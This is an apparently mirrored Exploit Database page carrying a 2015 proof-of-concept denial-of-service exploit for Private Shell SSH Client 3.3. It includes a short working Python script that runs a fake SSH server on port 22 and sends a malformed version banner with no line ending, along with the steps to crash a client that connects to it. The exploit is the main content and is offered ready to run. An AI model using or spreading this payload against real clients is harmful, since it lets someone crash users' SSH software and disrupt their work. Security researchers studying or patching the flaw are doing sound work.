Private Shell SSH Client 3.3 – Crash (PoC)

Exploit Database
14 阅读

作者： 3unnym00n

日期： 2015-05-29
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/37149/

'''
# Exploit title: privateshell SSH Client v.3.3 denial of service vulnerability
# Date: 27-5-2015
# Vendor homepage: www.privateshell.com
# Software Link: http://www.privateshell.com/files/pshell.exe
# Version: 3.3
# Author: 3unnym00n

# Details:
# --------
# when doing the ssh version exchange, if the server send a banner missing \r\n, can lead the pshell crash

# Tested On: win7
# operating steps: run the py, then execute : "D:\programfile\Private Shell\ssh.exe" root@127.0.0.1

'''



import socket
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.bind(('127.0.0.1', 22))
soc.listen(1)
client, addr = soc.accept()
client.send('SSH-2.0-SUCK') ## no "\r\n" lead to crash

last Exploits
Private Shell SSH Client 3.3 – Crash (PoC)的更多信息

Asterisk 13.17.2 – ‘chan_skinny’ Remote Memory Corruption：
VideoLAN VLC Media Player 1.0.6 – ‘.avi’ Media File Crash (PoC)：
Microsoft Windows – Uniscribe Font Processing Heap Memory Corruption Around ‘USP10!BuildFSM’ (MS17-011)：
lighttpd 1.4.31 – Denial of Service (PoC)：
WebKit – Universal Cross-Site Scripting due to Synchronous Page Loads：
Apple macOS 10.12.1 / iOS Kernel – ‘IOService::matchPassive’ Use-After-Free：
Skia and Firefox – Integer Overflow in SkTDArray Leading to Out-of-Bounds Write：
iOS/macOS – ‘task_swap_mach_voucher()’ Use-After-Free：